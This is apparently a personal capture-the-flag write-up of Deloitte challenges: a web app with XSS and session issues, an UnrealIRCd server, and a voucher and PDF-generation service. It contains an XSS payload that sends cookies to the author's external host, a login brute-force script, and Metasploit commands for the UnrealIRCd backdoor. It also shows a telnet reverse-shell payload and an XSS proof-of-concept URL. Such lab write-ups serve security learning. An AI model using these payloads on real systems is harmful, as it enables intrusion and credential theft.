Results of Deloitte CTF

Tools used are Burp 2.1.03, sqlmap de632388971b8c1ad54c9ee37885d679885e0657, Python 3, Metasploit 5.0.42+20190819102518~1rapid7-1, Nessus, gdb, valgrind and hardening-check (from Debian package devscripts).

Raccoon coin

Noticed following message in support sector: “We have looked at your message from a secure non-internet connected system via http://localhost/get_message?id=e761f860fd044c0f3543f65ce2e09ef0 However due to the high demand for Raccoon Coins we cannot respond.”

Maybe session cookies were used or something else is executed when admin visits message. Tried to Burp active scan parameters in: /challenge/fc2fc6ee458fc64442976a4b75861f1c/send_message?to=test&message=test&action=Send and after that chained queries GET /support and GET /get_message?id=<latest id here> and found out that application is vulnerable to cross-site scripting vulnerability when message is read with get_message.

Tried: '"><script type="text/javascript">document.location='https://hsalo.nerv.fi/foo.php?c='+document.cookie;</script>

Noticed that cookie is HttpOnly. Secure flag is not set so it will be sent via http:// also. Injected BeEF (The Browser Exploitation Framework) to my own message and checked that injected JavaScript was working as expected. Sent same malicious message to admin user nothing happened.

Tried Burp active scanner and sqlmap against all found parameters logged in and without session.

Login tells if username is correct and if password is incorrect. Tried bruteforce with script raccoon-brute.py. This is probably not the task in this challenge as there is timelimit. Python test code below:

import requests
import itertools
import hashlib
import sys

chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' ] username = 'admin'

def do_md5hash(keyword): return(hashlib.md5(keyword.encode()).hexdigest())

def do_query(username, password, hashed_pass): print('[] Pass / hash: %s / %s' % (password, hashed_pass)) r = requests.post('https://portal.hackazon.org/challenge/19585893949dc42d0fbae1b3bb79b330/login', data = {'name': username, 'password': hashed_pass, 'action': 'Login'}) if r.status_code != int('200'): print('[!] Something failed and did not receive 200 status code') if r.text == "Invalid password": print('[] invalid') else: print("[!] VALID PASSWORD: %s" % password) sys.exit()

if name == "main": for cleartext_pass in [''.join(i) for i in itertools.product(chars, repeat = 4)]: hashed_pass = do_md5hash(cleartext_pass) do_query(username, cleartext_pass, hashed_pass)

Noticed that support message functionality is affected by CSRF vulnerability.

Analyzed tokens and did 20000 logins and only 709 unique “session” cookies were found. Definitely something to research more.

Tested to signup as admin and failed “Cannot signup as admin” and with same as previously “Error user already exists”.

What is the generated pass? Looks like random. Maybe there is issues with the MD5 library or random components.

Edit:

  • 2019-08-29: Logged in 20k times, took session tokens, checked /index with session tokens and only could find my own account. Old sessions are not invalidated if user logins multiple times.
  • 2019-09-01: New Set-Cookie is always given when fetching e.g. /index. Middle part of token e.g. (.EE0r6Q.) is iterating, but can’t figure out if there is some logic for full token.
  • Defender has PARTed us

    There seems to be IRC server running:

    hsalo@deloitte:~$ nmap -P0 -sV 10.6.0.2 -p0-
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 19:28 EEST
    Nmap scan report for 10.6.0.2
    Host is up (0.11s latency).
    Not shown: 65534 closed ports
    PORT      STATE SERVICE VERSION
    6667/tcp  open  irc     UnrealIRCd
    11111/tcp open  irc     UnrealIRCd
    Service Info: Host: irc.cerulean.cave
    

    Joined IRC and seems to be normal server with old versions running:

    13:56 !irc.cerulean.cave *** Looking up your hostname...
    13:56 !irc.cerulean.cave *** Couldn't resolve your hostname; using your IP address instead
    13:56 -!- Capabilities requested: multi-prefix
    13:56 -!- Capabilities supported: account-notify away-notify multi-prefix userhost-in-names
    13:56 -!- Capabilities acknowledged: multi-prefix
    13:56 -!- Welcome to the Cerulean Cave IRC Network hsalo!hsalo@10.6.0.100
    13:56 -!- Your host is irc.cerulean.cave, running version Unreal3.2.10.4
    13:56 -!- This server was created Thu May 24 2018 at 09:53:36 UTC
    13:56 -!- irc.cerulean.cave Unreal3.2.10.4 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
    13:56 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are
              supported by this server
    13:56 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=Cerulean-Cave
              CASEMAPPING=ascii EXTBAN=~,qjncrRa ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
    13:56 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS are supported by this server
    13:56 -!- There are 1 users and 2 invisible on 2 servers
    13:56 -!- 2 operator(s) online
    13:56 -!- 2 channels formed
    13:56 -!- I have 2 clients and 1 servers
    13:56 -!- 2 2 Current local users 2, max 2
    13:56 -!- 3 3 Current global users 3, max 3
    13:56 -!- MOTD File is missing
    13:56 -!- Mode change [+iwx] for user hsalo
    13:56 Defender [Defender@cerulean.cave] requested CTCP VERSION from hsalo:
    

    Ash in IRC gives a tip:

    19:32 <@Ash> Hm, I don't trust these newcomers, let's check the status
    19:32 <@Ash> status
    19:32 <@Ash> Luckily I keep my secrets safely stored in File PO04
    19:32 <@Defender> IRC Defender Status
    19:32 <@Defender> 0 clients have been killed, from a total of 2 total connections.
    19:32 <@Defender> Uptime: 8 mins, 6 secs.
    19:32 <@Defender> Loaded modules: fyle, cgiirc, regexp_akill, version, conn_average, server
    19:32 <@Defender> Features provided: core-v1, server, unreal-server, native-gline, native-globops, fyle, cgiirc, regexp_akill, version, conn_average
    19:33 <@Ash> Doduo, I choose you! The legend rolls on.
    

    Tried to talk with Ash in private, but seems that he is not a people person. Tried DCC chat and did not receive response.

    Can’t create own channels. Can’t join other channels than #cave e.g. not able to join #opers. Didn’t find other hosts from network than .1, .2 and my own .100.

    Expected CVE-2010-2075 vulnerability, which was added backdoor to mirror packages allowing malicious users to execute arbitrary commands. Tried to exploit this with Metasploit without success.

    root@metasploit:# /opt/metasploit-framework/bin/msfupdate
    root@metasploit:# /opt/metasploit-framework/bin/msfconsole
    use exploit/unix/irc/unreal_ircd_3281_backdoor
    set RHOSTS 10.6.0.2
    set LHOSTS 10.6.0.100
    set RPORT 6667
    set LPORT 4444
    run
    

    Noticed from from Wireshark that exploit is send before normal IRC protocol connection is completed. Modified the script (timeouts etc) and also tried to send the payload using my own Python code without success.

    :irc.cerulean.cave NOTICE AUTH :*** Looking up your hostname...
    AB;sh -c '(sleep 4402|telnet 10.6.0.100 4444|while : ; do sh && break; done 2>&1|telnet 10.6.0.100 4444 >/dev/null 2>&1 &)'
    :irc.cerulean.cave NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :irc.cerulean.cave 451 AB;sh :You have not registered
    

    Port 11111 is for servers only:

    14:19 -!- Irssi: Connecting to 10.6.0.2 [10.6.0.2] port 11111
    14:19 -!- Irssi: Connection to 10.6.0.2 established
    14:19 -!- Capabilities requested: multi-prefix
    14:19 -!- Capabilities supported: account-notify away-notify multi-prefix userhost-in-names
    14:19 -!- ERROR Closing Link: hsalo[10.6.0.100] (This port is for servers only)
    14:19 -!- Irssi: Connection lost to 10.6.0.2
    

    Tested CVE-2010-2075 against 11111 port, but no success. Tested linking, but it does not work:

    14:53 [127] !irc.foonet.com *** Connecting to irc.cerulean.cave[10.6.0.2].
    14:53 [127] !irc.foonet.com ERROR from irc.cerulean.cave[10.6.0.2] -- Link denied (No matching link configuration) [@10.6.0.100.46552]
    14:53 [127] !irc.foonet.com ERROR from irc.cerulean.cave[10.6.0.2] -- Closing Link: [10.6.0.100] (Link denied (No matching link configuration))
    14:53 [127] !irc.foonet.com Lost connection to irc.cerulean.cave[10.6.0.2]: Read error
    

    Tested https://nmap.org/nsedoc/scripts/irc-sasl-brute.html issue, but SASL doesn’t seem to be enabled.

    Tested ARP spoofing MitM attack and didn’t seem to work in VPN. Also tested to use same IP as the IRC server, but that didn’t cause any other issues than my own connection not working properly as expected. Did not test VPN server exploits as that is not (probably) in the scope.

    Checked issues with Nessus. Nothing interesting found.

    Found out that IRC Defender also has some vulnerability, but I was unable to find more information about this yet (links not working and IRC-Security mailing list has been end of life for some time now). Maybe something to look from the source code.

    Santasales

    General notes

    Found cross-site scripting vulnerability in “/challenge/1dcef6e867f46463660adfd4d4adc55f/voucher?id=”, which can be reproduced using proof-of-concept: https://portal.hackazon.org/challenge/1dcef6e867f46463660adfd4d4adc55f/voucher?id=731%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E

    Flag 1

    Task is: “SantaSales issued a great voucher code for another visitor… can you find which one it was?”

    Found another voucher by exploiting insecure direct object reference (IDOR) in “id” parameter of “GET /challenge/1715df6ecdb606a849a80687ead5d41a/voucher?id=731”

    Flag 2

    Task is: “The voucher issuing system seems to be made out of rubber. Can you help the Grinch find the vulnerability?”

    My first suspect is that when PDF file is generated it contains Henri text from GET query “/challenge/1dcef6e867f46463660adfd4d4adc55f/download?id=731&name=Henri&email=henri%40nerv.fi&download=Download” and the PDF file is generated with “/PTEX.Fullbanner (This is pdfTeX, Version 3.14159265-2.6-1.40.16 (TeX Live 2015/Debian) kpathsea version 6.2.1)”, which means that there might be LaTeX vulnerabilities in the rendering. I have seen similar case in exercise and in real life.

    Iterating and trying to find LaTex vulnerabilities:

    With multiple different kinds of inputs I’m seeing “Rendering timeout or failure.” Might be a blacklist.

    Generated malicious payloads, send them to Elasticsearch instance from Burp, downloaded all PDF files and tried to find the issue without success.

    People have writeups in the internet about this e.g.:

    Flag 3

    Task is: “Santa’s elves built a text decoration tool… get access to the backend!”

    I suspect buffer overflow, but I wasn’t able to exploit this. I’m familiar with fuzzing but haven’t been creating exploits for buffer overflows often. Program lights.bin is using for example C printf function, which is common cause for vulnerabilities. I expect that after exploiting this vulnerability locally it would be possible to exploit it in web-service too to reveal secret flag.

    hsalo@deloitte:~$ hardening-check -R lights.bin
    lights.bin:
     Position Independent Executable: no, normal executable!
     Stack protected: no, not found!
     Fortify Source functions: no, only unprotected functions found!
     Read-only relocations: yes
     Immediate binding: no, not found!
     Stack clash protection: unknown, no -fstack-clash-protection instructions found
     Control flow integrity: unknown, no -fcf-protection instructions found!
    time
    __libc_start_main
    memcpy
    __gmon_start__
    localtime
    setbuf
    _ITM_registerTMCloneTable
    puts
    
    _Jv_RegisterClasses
    memset
    strcspn
    mktime
    _ITM_deregisterTMCloneTable
    printf
    fgets
    

    Image of the crash: